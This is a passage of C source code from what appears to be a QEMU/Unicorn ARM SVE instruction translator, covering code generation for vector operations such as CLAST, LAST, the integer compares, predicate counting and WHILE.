gen_set_label(tcg_ctx, done); } else { gen_set_label(tcg_ctx, over); } return true; } static bool trans_CLASTA_z(DisasContext *s, arg_rprr_esz *a) { return do_clast_vector(s, a, false); } static bool trans_CLASTB_z(DisasContext *s, arg_rprr_esz *a) { return do_clast_vector(s, a, true); } /* Compute CLAST for a scalar. */ static void do_clast_scalar(DisasContext *s, int esz, int pg, int rm, bool before, TCGv_i64 reg_val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 last = tcg_temp_new_i32(tcg_ctx); TCGv_i64 ele, cmp, zero; find_last_active(s, last, esz, pg); /* Extend the original value of last prior to incrementing. */ cmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, cmp, last); if (!before) { incr_last_active(s, last, esz); } /* The conceit here is that while last < 0 indicates not found, after * adjusting for cpu_env->vfp.zregs[rm], it is still a valid address * from which we can load garbage. We then discard the garbage with * a conditional move. */ ele = load_last_active(s, last, rm, esz); tcg_temp_free_i32(tcg_ctx, last); zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, reg_val, cmp, zero, ele, reg_val); tcg_temp_free_i64(tcg_ctx, zero); tcg_temp_free_i64(tcg_ctx, cmp); tcg_temp_free_i64(tcg_ctx, ele); } /* Compute CLAST for a Vreg. */ static bool do_clast_fp(DisasContext *s, arg_rpr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { int esz = a->esz; int ofs = vec_reg_offset(s, a->rd, 0, esz); TCGv_i64 reg = load_esz(tcg_ctx, tcg_ctx->cpu_env, ofs, esz); do_clast_scalar(s, esz, a->pg, a->rn, before, reg); write_fp_dreg(s, a->rd, reg); tcg_temp_free_i64(tcg_ctx, reg); } return true; } static bool trans_CLASTA_v(DisasContext *s, arg_rpr_esz *a) { return do_clast_fp(s, a, false); } static bool trans_CLASTB_v(DisasContext *s, arg_rpr_esz *a) { return do_clast_fp(s, a, true); } /* Compute CLAST for a Xreg. */ static bool do_clast_general(DisasContext *s, arg_rpr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 reg; if (!sve_access_check(s)) { return true; } reg = cpu_reg(s, a->rd); switch (a->esz) { case 0: tcg_gen_ext8u_i64(tcg_ctx, reg, reg); break; case 1: tcg_gen_ext16u_i64(tcg_ctx, reg, reg); break; case 2: tcg_gen_ext32u_i64(tcg_ctx, reg, reg); break; case 3: break; default: g_assert_not_reached(); } do_clast_scalar(s, a->esz, a->pg, a->rn, before, reg); return true; } static bool trans_CLASTA_r(DisasContext *s, arg_rpr_esz *a) { return do_clast_general(s, a, false); } static bool trans_CLASTB_r(DisasContext *s, arg_rpr_esz *a) { return do_clast_general(s, a, true); } /* Compute LAST for a scalar. */ static TCGv_i64 do_last_scalar(DisasContext *s, int esz, int pg, int rm, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 last = tcg_temp_new_i32(tcg_ctx); TCGv_i64 ret; find_last_active(s, last, esz, pg); if (before) { wrap_last_active(s, last, esz); } else { incr_last_active(s, last, esz); } ret = load_last_active(s, last, rm, esz); tcg_temp_free_i32(tcg_ctx, last); return ret; } /* Compute LAST for a Vreg. */ static bool do_last_fp(DisasContext *s, arg_rpr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 val = do_last_scalar(s, a->esz, a->pg, a->rn, before); write_fp_dreg(s, a->rd, val); tcg_temp_free_i64(tcg_ctx, val); } return true; } static bool trans_LASTA_v(DisasContext *s, arg_rpr_esz *a) { return do_last_fp(s, a, false); } static bool trans_LASTB_v(DisasContext *s, arg_rpr_esz *a) { return do_last_fp(s, a, true); } /* Compute LAST for a Xreg. */ static bool do_last_general(DisasContext *s, arg_rpr_esz *a, bool before) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 val = do_last_scalar(s, a->esz, a->pg, a->rn, before); tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, a->rd), val); tcg_temp_free_i64(tcg_ctx, val); } return true; } static bool trans_LASTA_r(DisasContext *s, arg_rpr_esz *a) { return do_last_general(s, a, false); } static bool trans_LASTB_r(DisasContext *s, arg_rpr_esz *a) { return do_last_general(s, a, true); } static bool trans_CPY_m_r(DisasContext *s, arg_rpr_esz *a) { if (sve_access_check(s)) { do_cpy_m(s, a->esz, a->rd, a->rd, a->pg, cpu_reg_sp(s, a->rn)); } return true; } static bool trans_CPY_m_v(DisasContext *s, arg_rpr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { int ofs = vec_reg_offset(s, a->rn, 0, a->esz); TCGv_i64 t = load_esz(tcg_ctx, tcg_ctx->cpu_env, ofs, a->esz); do_cpy_m(s, a->esz, a->rd, a->rd, a->pg, t); tcg_temp_free_i64(tcg_ctx, t); } return true; } static bool trans_REVB(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_revb_h, gen_helper_sve_revb_s, gen_helper_sve_revb_d, }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_REVH(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { NULL, NULL, gen_helper_sve_revh_s, gen_helper_sve_revh_d, }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_REVW(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ool(s, a, a->esz == 3 ? gen_helper_sve_revw_d : NULL); } static bool trans_RBIT(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_rbit_b, gen_helper_sve_rbit_h, gen_helper_sve_rbit_s, gen_helper_sve_rbit_d, }; return do_zpz_ool(s, a, fns[a->esz]); } static bool trans_SPLICE(DisasContext *s, arg_rprr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_4_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), vsz, vsz, a->esz, gen_helper_sve_splice); } return true; } /* *** SVE Integer Compare - Vectors Group */ static bool do_ppzz_flags(DisasContext *s, arg_rprr_esz *a, gen_helper_gvec_flags_4 *gen_fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr pd, zn, zm, pg; unsigned vsz; TCGv_i32 t; if (gen_fn == NULL) { return false; } if (!sve_access_check(s)) { return true; } vsz = vec_full_reg_size(s); t = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); pd = tcg_temp_new_ptr(tcg_ctx); zn = tcg_temp_new_ptr(tcg_ctx); zm = tcg_temp_new_ptr(tcg_ctx); pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, pd, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, zm, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rm)); tcg_gen_addi_ptr(tcg_ctx, pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); gen_fn(tcg_ctx, t, pd, zn, zm, pg, t); tcg_temp_free_ptr(tcg_ctx, pd); tcg_temp_free_ptr(tcg_ctx, zn); tcg_temp_free_ptr(tcg_ctx, zm); tcg_temp_free_ptr(tcg_ctx, pg); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); return true; } #define DO_PPZZ(NAME, name) \ static bool trans_##NAME##_ppzz(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_flags_4 * const fns[4] = { \ gen_helper_sve_##name##_ppzz_b, gen_helper_sve_##name##_ppzz_h, \ gen_helper_sve_##name##_ppzz_s, gen_helper_sve_##name##_ppzz_d, \ }; \ return do_ppzz_flags(s, a, fns[a->esz]); \ } DO_PPZZ(CMPEQ, cmpeq) DO_PPZZ(CMPNE, cmpne) DO_PPZZ(CMPGT, cmpgt) DO_PPZZ(CMPGE, cmpge) DO_PPZZ(CMPHI, cmphi) DO_PPZZ(CMPHS, cmphs) #undef DO_PPZZ #define DO_PPZW(NAME, name) \ static bool trans_##NAME##_ppzw(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_flags_4 * const fns[4] = { \ gen_helper_sve_##name##_ppzw_b, gen_helper_sve_##name##_ppzw_h, \ gen_helper_sve_##name##_ppzw_s, NULL \ }; \ return do_ppzz_flags(s, a, fns[a->esz]); \ } DO_PPZW(CMPEQ, cmpeq) DO_PPZW(CMPNE, cmpne) DO_PPZW(CMPGT, cmpgt) DO_PPZW(CMPGE, cmpge) DO_PPZW(CMPHI, cmphi) DO_PPZW(CMPHS, cmphs) DO_PPZW(CMPLT, cmplt) DO_PPZW(CMPLE, cmple) DO_PPZW(CMPLO, cmplo) DO_PPZW(CMPLS, cmpls) #undef DO_PPZW /* *** SVE Integer Compare - Immediate Groups */ static bool do_ppzi_flags(DisasContext *s, arg_rpri_esz *a, gen_helper_gvec_flags_3 *gen_fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr pd, zn, pg; unsigned vsz; TCGv_i32 t; if (gen_fn == NULL) { return false; } if (!sve_access_check(s)) { return true; } vsz = vec_full_reg_size(s); t = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, a->imm)); pd = tcg_temp_new_ptr(tcg_ctx); zn = tcg_temp_new_ptr(tcg_ctx); pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, pd, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); gen_fn(tcg_ctx, t, pd, zn, pg, t); tcg_temp_free_ptr(tcg_ctx, pd); tcg_temp_free_ptr(tcg_ctx, zn); tcg_temp_free_ptr(tcg_ctx, pg); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); return true; } #define DO_PPZI(NAME, name) \ static bool trans_##NAME##_ppzi(DisasContext *s, arg_rpri_esz *a) \ { \ static gen_helper_gvec_flags_3 * const fns[4] = { \ gen_helper_sve_##name##_ppzi_b, gen_helper_sve_##name##_ppzi_h, \ gen_helper_sve_##name##_ppzi_s, gen_helper_sve_##name##_ppzi_d, \ }; \ return do_ppzi_flags(s, a, fns[a->esz]); \ } DO_PPZI(CMPEQ, cmpeq) DO_PPZI(CMPNE, cmpne) DO_PPZI(CMPGT, cmpgt) DO_PPZI(CMPGE, cmpge) DO_PPZI(CMPHI, cmphi) DO_PPZI(CMPHS, cmphs) DO_PPZI(CMPLT, cmplt) DO_PPZI(CMPLE, cmple) DO_PPZI(CMPLO, cmplo) DO_PPZI(CMPLS, cmpls) #undef DO_PPZI /* *** SVE Partition Break Group */ static bool do_brk3(DisasContext *s, arg_rprr_s *a, gen_helper_gvec_4 *fn, gen_helper_gvec_flags_4 *fn_s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = pred_full_reg_size(s); /* Predicate sizes may be smaller and cannot use simd_desc. */ TCGv_ptr d = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr n = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr m = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr g = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t = tcg_const_i32(tcg_ctx, vsz - 2); tcg_gen_addi_ptr(tcg_ctx, d, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, n, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, m, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rm)); tcg_gen_addi_ptr(tcg_ctx, g, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); if (a->s) { fn_s(tcg_ctx, t, d, n, m, g, t); do_pred_flags(tcg_ctx, t); } else { fn(tcg_ctx, d, n, m, g, t); } tcg_temp_free_ptr(tcg_ctx, d); tcg_temp_free_ptr(tcg_ctx, n); tcg_temp_free_ptr(tcg_ctx, m); tcg_temp_free_ptr(tcg_ctx, g); tcg_temp_free_i32(tcg_ctx, t); return true; } static bool do_brk2(DisasContext *s, arg_rpr_s *a, gen_helper_gvec_3 *fn, gen_helper_gvec_flags_3 *fn_s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = pred_full_reg_size(s); /* Predicate sizes may be smaller and cannot use simd_desc. */ TCGv_ptr d = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr n = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr g = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t = tcg_const_i32(tcg_ctx, vsz - 2); tcg_gen_addi_ptr(tcg_ctx, d, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, n, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, g, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); if (a->s) { fn_s(tcg_ctx, t, d, n, g, t); do_pred_flags(tcg_ctx, t); } else { fn(tcg_ctx, d, n, g, t); } tcg_temp_free_ptr(tcg_ctx, d); tcg_temp_free_ptr(tcg_ctx, n); tcg_temp_free_ptr(tcg_ctx, g); tcg_temp_free_i32(tcg_ctx, t); return true; } static bool trans_BRKPA(DisasContext *s, arg_rprr_s *a) { return do_brk3(s, a, gen_helper_sve_brkpa, gen_helper_sve_brkpas); } static bool trans_BRKPB(DisasContext *s, arg_rprr_s *a) { return do_brk3(s, a, gen_helper_sve_brkpb, gen_helper_sve_brkpbs); } static bool trans_BRKA_m(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brka_m, gen_helper_sve_brkas_m); } static bool trans_BRKB_m(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brkb_m, gen_helper_sve_brkbs_m); } static bool trans_BRKA_z(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brka_z, gen_helper_sve_brkas_z); } static bool trans_BRKB_z(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brkb_z, gen_helper_sve_brkbs_z); } static bool trans_BRKN(DisasContext *s, arg_rpr_s *a) { return do_brk2(s, a, gen_helper_sve_brkn, gen_helper_sve_brkns); } /* *** SVE Predicate Count Group */ static void do_cntp(DisasContext *s, TCGv_i64 val, int esz, int pn, int pg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned psz = pred_full_reg_size(s); if (psz <= 8) { uint64_t psz_mask; tcg_gen_ld_i64(tcg_ctx, val, tcg_ctx->cpu_env, pred_full_reg_offset(s, pn)); if (pn != pg) { TCGv_i64 g = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, g, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); tcg_gen_and_i64(tcg_ctx, val, val, g); tcg_temp_free_i64(tcg_ctx, g); } /* Reduce the pred_esz_masks value simply to reduce the * size of the code generated here. */ psz_mask = MAKE_64BIT_MASK(0, psz * 8); tcg_gen_andi_i64(tcg_ctx, val, val, pred_esz_masks[esz] & psz_mask); tcg_gen_ctpop_i64(tcg_ctx, val, val); } else { TCGv_ptr t_pn = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_pg = tcg_temp_new_ptr(tcg_ctx); unsigned desc; TCGv_i32 t_desc; desc = psz - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, esz); tcg_gen_addi_ptr(tcg_ctx, t_pn, tcg_ctx->cpu_env, pred_full_reg_offset(s, pn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); t_desc = tcg_const_i32(tcg_ctx, desc); gen_helper_sve_cntp(tcg_ctx, val, t_pn, t_pg, t_desc); tcg_temp_free_ptr(tcg_ctx, t_pn); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, t_desc); } } static bool trans_CNTP(DisasContext *s, arg_CNTP *a) { if (sve_access_check(s)) { do_cntp(s, cpu_reg(s, a->rd), a->esz, a->rn, a->pg); } return true; } static bool trans_INCDECP_r(DisasContext *s, arg_incdec_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 reg = cpu_reg(s, a->rd); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); do_cntp(s, val, a->esz, a->pg, a->pg); if (a->d) { tcg_gen_sub_i64(tcg_ctx, reg, reg, val); } else { tcg_gen_add_i64(tcg_ctx, reg, reg, val); } tcg_temp_free_i64(tcg_ctx, val); } return true; } static bool trans_INCDECP_z(DisasContext *s, arg_incdec2_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); GVecGen2sFn *gvec_fn = a->d ? tcg_gen_gvec_subs : tcg_gen_gvec_adds; do_cntp(s, val, a->esz, a->pg, a->pg); gvec_fn(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), val, vsz, vsz); } return true; } static bool trans_SINCDECP_r_32(DisasContext *s, arg_incdec_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 reg = cpu_reg(s, a->rd); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); do_cntp(s, val, a->esz, a->pg, a->pg); do_sat_addsub_32(tcg_ctx, reg, val, a->u, a->d); } return true; } static bool trans_SINCDECP_r_64(DisasContext *s, arg_incdec_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 reg = cpu_reg(s, a->rd); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); do_cntp(s, val, a->esz, a->pg, a->pg); do_sat_addsub_64(tcg_ctx, reg, val, a->u, a->d); } return true; } static bool trans_SINCDECP_z(DisasContext *s, arg_incdec2_pred *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); do_cntp(s, val, a->esz, a->pg, a->pg); do_sat_addsub_vec(s, a->esz, a->rd, a->rn, val, a->u, a->d); } return true; } /* *** SVE Integer Compare Scalars Group */ static bool trans_CTERM(DisasContext *s, arg_CTERM *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } TCGCond cond = (a->ne ? TCG_COND_NE : TCG_COND_EQ); TCGv_i64 rn = read_cpu_reg(s, a->rn, a->sf); TCGv_i64 rm = read_cpu_reg(s, a->rm, a->sf); TCGv_i64 cmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, cond, cmp, rn, rm); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, cmp); tcg_temp_free_i64(tcg_ctx, cmp); /* VF = !NF & !CF. */ tcg_gen_xori_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, 1); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_ctx->cpu_CF); /* Both NF and VF actually look at bit 31. */ tcg_gen_neg_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF); tcg_gen_neg_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF); return true; } static bool trans_WHILE(DisasContext *s, arg_WHILE *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 op0, op1, t0, t1, tmax; TCGv_i32 t2, t3; TCGv_ptr ptr; unsigned desc, vsz = vec_full_reg_size(s); TCGCond cond; if (!sve_access_check(s)) { return true; } op0 = read_cpu_reg(s, a->rn, 1); op1 = read_cpu_reg(s, a->rm, 1); if (!a->sf) { if (a->u) { tcg_gen_ext32u_i64(tcg_ctx, op0, op0); tcg_gen_ext32u_i64(tcg_ctx, op1, op1); } else { tcg_gen_ext32s_i64(tcg_ctx, op0, op0); tcg_gen_ext32s_i64(tcg_ctx, op1, op1); } } /* For the helper, compress the different conditions into a computation * of how many iterations for which the condition is true. */ t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, t0, op1, op0); tmax = tcg_const_i64(tcg_ctx, vsz >> a->esz); if (a->eq) { /* Equality means one more iteration. */ tcg_gen_addi_i64(tcg_ctx, t0, t0, 1); /* If op1 is max (un)signed integer (and the only time the addition * above could overflow), then we produce an all-true predicate by * setting the count to the vector length. This is because the * pseudocode is described as an increment + compare loop, and the * max integer would always compare true. */ tcg_gen_movi_i64(tcg_ctx, t1, (a->sf ? (a->u ? UINT64_MAX : INT64_MAX) : (a->u ? UINT32_MAX : INT32_MAX))); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, op1, t1, tmax, t0); } /* Bound to the maximum. */ tcg_gen_umin_i64(tcg_ctx, t0, t0, tmax); tcg_temp_free_i64(tcg_ctx, tmax); /* Set the count to zero if the condition is false. */ cond = (a->u ? (a->eq ? TCG_COND_LEU : TCG_COND_LTU) : (a->eq ? TCG_COND_LE : TCG_COND_LT)); tcg_gen_movi_i64(tcg_ctx, t1, 0); tcg_gen_movcond_i64(tcg_ctx, cond, t0, op0, op1, t0, t1); tcg_temp_free_i64(tcg_ctx, t1); /* Since we're bounded, pass as a 32-bit type. */ t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t2, t0); tcg_temp_free_i64(tcg_ctx, t0); /* Scale elements to bits. */ tcg_gen_shli_i32(tcg_ctx, t2, t2, a->esz); desc = (vsz / 8) - 2; desc = deposit32(desc, SIMD_DATA_SHIFT, 2, a->esz); t3 = tcg_const_i32(tcg_ctx, desc); ptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, ptr, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); gen_helper_sve_while(tcg_ctx, t2, ptr, t2, t3); do_pred_flags(tcg_ctx, t2); tcg_temp_free_ptr(tcg_ctx, ptr); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); return true; } /* *** SVE Integer Wide Immediate - Unpredicated Group */ static bool trans_FDUP(DisasContext *s, arg_FDUP *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); int dofs = vec_full_reg_offset(s, a->rd); uint64_t imm; /* Decode the VFP immediate. */ imm = vfp_expand_imm(a->esz, a->imm); imm = dup_const(a->esz, imm); tcg_gen_gvec_dup64i(tcg_ctx, dofs, vsz, vsz, imm); } return true; } static bool trans_DUP_i(DisasContext *s, arg_DUP_i *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); int dofs = vec_full_reg_offset(s, a->rd); tcg_gen_gvec_dup64i(tcg_ctx, dofs, vsz, vsz, dup_const(a->esz, a->imm)); } return true; } static bool trans_ADD_zzi(DisasContext *s, arg_rri_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_addi(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), a->imm, vsz, vsz); } return true; } static bool trans_SUB_zzi(DisasContext *s, arg_rri_esz *a) { a->imm = -a->imm; return trans_ADD_zzi(s, a); } static bool trans_SUBR_zzi(DisasContext *s, arg_rri_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static const TCGOpcode vecop_list[] = { INDEX_op_sub_vec, 0 }; static const GVecGen2s op[4] = { { .fni8 = tcg_gen_vec_sub8_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_sve_subri_b, .opt_opc = vecop_list, .vece = MO_8, .scalar_first = true }, { .fni8 = tcg_gen_vec_sub16_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_sve_subri_h, .opt_opc = vecop_list, .vece = MO_16, .scalar_first = true }, { .fni4 = tcg_gen_sub_i32, .fniv = tcg_gen_sub_vec, .fno = gen_helper_sve_subri_s, .opt_opc = vecop_list, .vece = MO_32, .scalar_first = true }, { .fni8 = tcg_gen_sub_i64, .fniv = tcg_gen_sub_vec, .fno = gen_helper_sve_subri_d, .opt_opc = vecop_list, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .vece = MO_64, .scalar_first = true } }; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i64 c = tcg_const_i64(tcg_ctx, a->imm); tcg_gen_gvec_2s(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vsz, vsz, c, &op[a->esz]); tcg_temp_free_i64(tcg_ctx, c); } return true; } static bool trans_MUL_zzi(DisasContext *s, arg_rri_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_muli(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), a->imm, vsz, vsz); } return true; } static bool do_zzi_sat(DisasContext *s, arg_rri_esz *a, bool u, bool d) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0 && extract32(s->insn, 13, 1)) { return false; } if (sve_access_check(s)) { TCGv_i64 val = tcg_const_i64(tcg_ctx, a->imm); do_sat_addsub_vec(s, a->esz, a->rd, a->rn, val, u, d); tcg_temp_free_i64(tcg_ctx, val); } return true; } static bool trans_SQADD_zzi(DisasContext *s, arg_rri_esz *a) { return do_zzi_sat(s, a, false, false); } static bool trans_UQADD_zzi(DisasContext *s, arg_rri_esz *a) { return do_zzi_sat(s, a, true, false); } static bool trans_SQSUB_zzi(DisasContext *s, arg_rri_esz *a) { return do_zzi_sat(s, a, false, true); } static bool trans_UQSUB_zzi(DisasContext *s, arg_rri_esz *a) { return do_zzi_sat(s, a, true, true); } static bool do_zzi_ool(DisasContext *s, arg_rri_esz *a, gen_helper_gvec_2i *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i64 c = tcg_const_i64(tcg_ctx, a->imm); tcg_gen_gvec_2i_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), c, vsz, vsz, 0, fn); tcg_temp_free_i64(tcg_ctx, c); } return true; } #define DO_ZZI(NAME, name) \ static bool trans_##NAME##_zzi(DisasContext *s, arg_rri_esz *a) \ { \ static gen_helper_gvec_2i * const fns[4] = { \ gen_helper_sve_##name##i_b, gen_helper_sve_##name##i_h, \ gen_helper_sve_##name##i_s, gen_helper_sve_##name##i_d, \ }; \ return do_zzi_ool(s, a, fns[a->esz]); \ } DO_ZZI(SMAX, smax) DO_ZZI(UMAX, umax) DO_ZZI(SMIN, smin) DO_ZZI(UMIN, umin) #undef DO_ZZI static bool trans_DOT_zzz(DisasContext *s, arg_DOT_zzz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[2][2] = { { gen_helper_gvec_sdot_b, gen_helper_gvec_sdot_h }, { gen_helper_gvec_udot_b, gen_helper_gvec_udot_h } }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, 0, fns[a->u][a->sz]); } return true; } static bool trans_DOT_zzx(DisasContext *s, arg_DOT_zzx *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[2][2] = { { gen_helper_gvec_sdot_idx_b, gen_helper_gvec_sdot_idx_h }, { gen_helper_gvec_udot_idx_b, gen_helper_gvec_udot_idx_h } }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, a->index, fns[a->u][a->sz]); } return true; } /* *** SVE Floating Point Multiply-Add Indexed Group */ static bool trans_FMLA_zzxz(DisasContext *s, arg_FMLA_zzxz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_4_ptr * const fns[3] = { gen_helper_gvec_fmla_idx_h, gen_helper_gvec_fmla_idx_s, gen_helper_gvec_fmla_idx_d, }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); 